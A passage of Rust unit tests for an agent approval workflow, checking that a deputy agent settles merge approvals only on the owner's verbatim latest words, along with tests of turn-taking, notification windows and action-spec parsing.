2864 q.deputy = Some(dep);
2865 q
2866 }
2867
2868 #[test]
2869 fn a_merge_approval_settles_on_a_verbatim_quote_of_the_latest_message() {
2870 let mut q = approval_question();
2871 q.say("merge").unwrap();
2872 q.reply("sure?", vec!["merge".into(), "hold".into()])
2873 .unwrap();
2874 q.say(" Merge it please ").unwrap();
2875 assert!(
2876 q.settle_by_deputy("deputy-x", "merge", " ").is_err(),
2877 "an empty quote is refused"
2878 );
2879 assert!(
2880 q.settle_by_deputy("deputy-x", "merge", "ship it").is_err(),
2881 "a quote the owner never said is refused"
2882 );
2883 assert_eq!(q.status, QuestionStatus::Open);
2884 q.settle_by_deputy("deputy-x", "merge", "Merge it please")
2885 .unwrap();
2886 assert_eq!(q.resolution().as_deref(), Some("merge"));
2887 }
2888
2889 #[test]
2890 fn a_local_release_approval_is_held_to_the_merge_rules_but_an_escalation_is_not() {
2891 let mk = |choices: Vec<String>| {
2892 let mut q = Question::new(
2893 String::new(),
2894 crate::bump::NOTICE_NODE.into(),
2895 "release-watch".into(),
2896 "Release?".into(),
2897 String::new(),
2898 choices,
2899 );
2900 let mut dep = Deputy::new("brief".into());
2901 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2902 q.deputy = Some(dep);
2903 q
2904 };
2905 let mut approval = mk(vec!["merge".into(), "hold".into()]);
2906 assert!(crate::deputy::merge_gated(&approval));
2907 approval.say("マージしていいよ").unwrap();
2908 assert!(
2909 approval
2910 .settle_by_deputy("deputy-x", "merge", "ぜひマージして")
2911 .is_err(),
2912 "a quote the owner never said is refused"
2913 );
2914 approval
2915 .settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2916 .unwrap();
2917
2918 let mut esc = mk(vec!["rerun again".into(), "hold".into(), "leave it".into()]);
2919 assert!(!crate::deputy::merge_gated(&esc));
2920 esc.say("もう監視はいらない").unwrap();
2921 esc.settle_by_deputy("deputy-x", "leave it", "監視はいらない")
2922 .unwrap();
2923 assert_eq!(esc.resolution().as_deref(), Some("leave it"));
2924 }
2925
2926 #[test]
2927 fn a_merge_among_other_requests_settles_but_hold_needs_the_whole_message() {
2928 let mut q = approval_question();
2929 q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2930 .unwrap();
2931 assert!(
2932 q.settle_by_deputy("deputy-x", "merge", "どこかの言葉")
2933 .is_err(),
2934 "the quote must be the owner's"
2935 );
2936 assert!(
2937 q.settle_by_deputy("deputy-x", "hold", "マージしていいよ")
2938 .is_err(),
2939 "`hold` still needs the whole message"
2940 );
2941 q.settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2942 .unwrap();
2943 assert_eq!(q.resolution().as_deref(), Some("merge"));
2944 }
2945
2946 #[test]
2947 fn a_quote_from_an_earlier_owner_message_does_not_settle_a_merge() {
2948 let mut q = approval_question();
2949 q.say("merge").unwrap();
2950 q.reply("sure?", vec!["merge".into(), "hold".into()])
2951 .unwrap();
2952 q.say("wait, hold off").unwrap();
2953 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2954 assert_eq!(q.status, QuestionStatus::Open);
2955 }
2956
2957 #[test]
2958 fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
2959 let mut q = Question::new(
2960 "task".to_owned(),
2961 "conduct".to_owned(),
2962 "conduct".to_owned(),
2963 "Done?".to_owned(),
2964 String::new(),
2965 vec!["yes".to_owned(), "no".to_owned()],
2966 );
2967 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2968 seat.turns = 1;
2969 let mut dep = Deputy::new("brief".to_owned());
2970 dep.seat = Some(seat);
2971 q.deputy = Some(dep);
2972 q.say("setup done, go ahead").unwrap();
2973
2974 assert!(
2975 q.settle_by_deputy("someone-else", "yes", "setup done")
2976 .is_err()
2977 );
2978 assert!(
2979 q.settle_by_deputy("deputy-x", "maybe", "setup done")
2980 .is_err()
2981 );
2982 assert!(
2983 q.settle_by_deputy("deputy-x", "yes", "never said this")
2984 .is_err()
2985 );
2986 assert!(q.settle_by_deputy("deputy-x", "yes", " ").is_err());
2987 assert_eq!(q.status, QuestionStatus::Open);
2988
2989 q.settle_by_deputy("deputy-x", "yes", "setup done").unwrap();
2990 assert_eq!(q.status, QuestionStatus::Answered);
2991 assert_eq!(q.resolution().as_deref(), Some("yes"));
2992 let last = q.thread.last().unwrap();
2993 assert_eq!(last.who, Who::Agent);
2994 assert!(
2995 last.body.contains("setup done"),
2996 "the quote stays on the record"
2997 );
2998 }
2999
3000 #[test]
3001 fn a_question_written_before_deputies_still_reads() {
3002 let mut q = Question::new(
3003 "task".to_owned(),
3004 "conduct".to_owned(),
3005 "conduct".to_owned(),
3006 "Done?".to_owned(),
3007 String::new(),
3008 Vec::new(),
3009 );
3010 q.schema = 4;
3011 let mut v = serde_json::to_value(&q).unwrap();
3012 v.as_object_mut().unwrap().remove("deputy");
3013 let back: Question = serde_json::from_value(v).unwrap();
3014 assert!(back.deputy.is_none());
3015 }
3016
3017 #[test]
3018 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
3019 let mut q = choice_question();
3020 q.say("does the cache need eviction?").unwrap();
3021 assert_eq!(q.thread.len(), 1);
3022 assert_eq!(q.thread[0].who, Who::Operator);
3023 assert_eq!(q.thread[0].body, "does the cache need eviction?");
3024 assert_eq!(q.status, QuestionStatus::Open);
3027 assert!(q.answer.is_none());
3028 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
3029 }
3030
3031 #[test]
3032 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
3033 let mut answered = choice_question();
3034 answered
3035 .answer(Answer::Choice("SQLite".to_owned()))
3036 .unwrap();
3037 let a = answered.say("still there?").unwrap_err().to_string();
3038 assert!(a.contains("already answered"), "{a}");
3039 let b = answered
3040 .reply("still there?", vec![])
3041 .unwrap_err()
3042 .to_string();
3043 assert!(b.contains("already answered"), "{b}");
3044
3045 let mut abandoned = choice_question();
3046 abandoned.abandon("timed out");
3047 let c = abandoned.say("hello?").unwrap_err().to_string();
3048 assert!(c.contains("abandoned"), "{c}");
3049
3050 let mut open = choice_question();
3051 let d = open.say(" ").unwrap_err().to_string();
3052 assert!(d.contains("empty"), "{d}");
3053 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
3054 assert!(e.contains("empty"), "{e}");
3055 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
3056 }
3057
3058 #[test]
3059 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
3060 let mut q = choice_question();
3061 q.say("SQLite or Redis, but what about disk space?")
3062 .unwrap();
3063 assert!(q.waiting_on_agent());
3064
3065 q.reply(
3066 "SQLite: it is one file, no server to run.",
3067 vec!["SQLite".to_owned()],
3068 )
3069 .unwrap();
3070
3071 assert_eq!(q.choices, ["SQLite"]);
3072 assert!(
3073 !q.waiting_on_agent(),
3074 "the agent spoke, so the owner is the one being waited on now"
3075 );
3076 assert_eq!(q.thread.len(), 2);
3077 assert_eq!(q.thread[1].who, Who::Agent);
3078
3079 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3081 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3082 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3083 }
3084
3085 #[test]
3086 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3087 let mut fresh = choice_question();
3088 assert!(
3089 fresh.should_notify(Timestamp::now()),
3090 "nobody has been notified yet, so the first ask always pages"
3091 );
3092
3093 fresh.say("why not Postgres?").unwrap();
3094 let just_said = fresh.thread[0].at;
3095 assert!(
3096 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3097 "still on the screen a minute later; no need to page again"
3098 );
3099 assert!(
3100 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3101 "exactly the window: `>` means this side stays quiet"
3102 );
3103 assert!(
3104 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3105 "past the window: they may have walked away"
3106 );
3107 }
3108
3109 #[test]
3110 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3111 let (_dir, s) = store();
3112 let mut q = choice_question();
3113 s.put(&mut q).unwrap();
3114 q.say("why not Postgres?").unwrap();
3115 s.put(&mut q).unwrap();
3116 q.reply("no server to run", vec!["SQLite".to_owned()])
3117 .unwrap();
3118 s.put(&mut q).unwrap();
3119
3120 assert_eq!(
3121 s.count_open(),
3122 1,
3123 "one question that talked twice is still one open question"
3124 );
3125 assert_eq!(s.open_for(&q.run).len(), 1);
3126 }
3127
3128 #[tokio::test]
3129 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3130 let (dir, s) = store();
3131 let mut q = choice_question();
3132 let id = q.id.clone();
3133 let writer = Questions::at(dir.path().join("questions"));
3134 let handle = tokio::spawn(async move {
3135 tokio::time::sleep(Duration::from_millis(30)).await;
3136 let mut fresh = writer.get(&id).expect("the question was filed first");
3137 fresh.say("why not Postgres?").unwrap();
3138 writer.put(&mut fresh).unwrap();
3139 });
3140
3141 let got = wait_for_owner(
3142 &mut q,
3143 &s,
3144 &quiet(),
3145 Duration::from_secs(5),
3146 Duration::from_millis(10),
3147 )
3148 .await
3149 .unwrap();
3150
3151 handle.await.unwrap();
3152 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3153 assert_eq!(
3154 q.status,
3155 QuestionStatus::Open,
3156 "talking back is not a decision; the question stays open"
3157 );
3158 assert!(q.answer.is_none());
3159 }
3160
3161 #[test]
3162 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3163 let mut q = choice_question();
3164 q.say("A").unwrap();
3165 q.delivered_turns = q.thread.len();
3166 q.say("B").unwrap();
3167 q.reply("about A", vec![]).unwrap();
3168 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3169 q.delivered_turns = q.thread.len();
3170 assert_eq!(q.unread_from_owner(), None);
3171 }
3172
3173 #[test]
3174 fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3175 let (_d, s) = store();
3176 let mut q = choice_question();
3177 s.put(&mut q).unwrap();
3178 q.say("first").unwrap();
3179 q.say("second").unwrap();
3180 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3181 s.put(&mut q).unwrap();
3182 assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3183 let mut out = Vec::new();
3184 deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3185 let shown = String::from_utf8(out).unwrap();
3186 let (a, b, c) = (
3187 shown.find("first").unwrap(),
3188 shown.find("second").unwrap(),
3189 shown.find("SQLite").unwrap(),
3190 );
3191 assert!(a < b && b < c, "{shown}");
3192 assert_eq!(q.delivered_turns, q.thread.len());
3193 assert!(q.answer_delivered);
3194 }
3195
3196 #[test]
3197 fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3198 let mut q = choice_question();
3199 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3200 assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3201 let mut q = choice_question();
3202 q.say("old").unwrap();
3203 q.delivered_turns = q.thread.len();
3204 q.say("new").unwrap();
3205 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3206 let shown = answer_for_agent(&q, "SQLite");
3207 assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3208 }
3209
3210 #[test]
3211 fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3212 let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3213 let ok = parse_actions(
3214 &[
3215 "resume で続行する=resume".to_owned(),
3216 "wait=done".to_owned(),
3217 ],
3218 &choices,
3219 "run-1",
3220 )
3221 .unwrap();
3222 assert_eq!(
3223 ok["resume で続行する"],
3224 ChoiceAction::Resume {
3225 run: "run-1".into()
3226 }
3227 );
3228 assert_eq!(ok["wait"], ChoiceAction::Done);
3229
3230 let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3231 assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3232 assert_eq!(
3233 ChoiceAction::parse("x=requeue", "").unwrap().1,
3234 ChoiceAction::Requeue
3235 );
3236
3237 for bad in [
3238 "no-equals",
3239 "=done",
3240 "x=resume",
3241 "x=resume:",
3242 "x=explode",
3243 "x=done:1",
3244 ] {
3245 assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3246 }
3247 assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3248 assert!(
3249 parse_actions(
3250 &["wait=done".to_owned(), "wait=requeue".to_owned()],
3251 &choices,
3252 ""
3253 )
3254 .is_err()
3255 );
3256 }
3257
3258 #[test]
3259 fn only_a_chosen_label_with_an_action_is_actionable() {
3260 let mut q = choice_question();
3261 q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3262 q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3263 assert!(q.chosen_action().is_none(), "unanswered");
3264 q.answer(Answer::Choice("resume".to_owned())).unwrap();
3265 assert!(
3266 q.chosen_action().is_none(),
3267 "a label that merely reads like an action does nothing"
3268 );
3269
3270 let mut q2 = choice_question();
3271 q2.choices = vec!["SQLite".to_owned()];
3272 q2.actions
3273 .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3274 q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3275 assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3276 }
3277
3278 #[test]
3279 fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3280 let mut q = choice_question();
3281 q.choices = vec!["A".to_owned(), "B".to_owned()];
3282 q.actions.insert("A".to_owned(), ChoiceAction::Done);
3283 q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3284 q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3285 assert_eq!(q.actions.len(), 1);
3286 assert!(q.actions.contains_key("B"));
3287
3288 let mut v = serde_json::to_value(&q).unwrap();
3289 v.as_object_mut().unwrap().remove("actions");
3290 let old: Question = serde_json::from_value(v).unwrap();
3291 assert!(old.actions.is_empty());
3292 }
3293}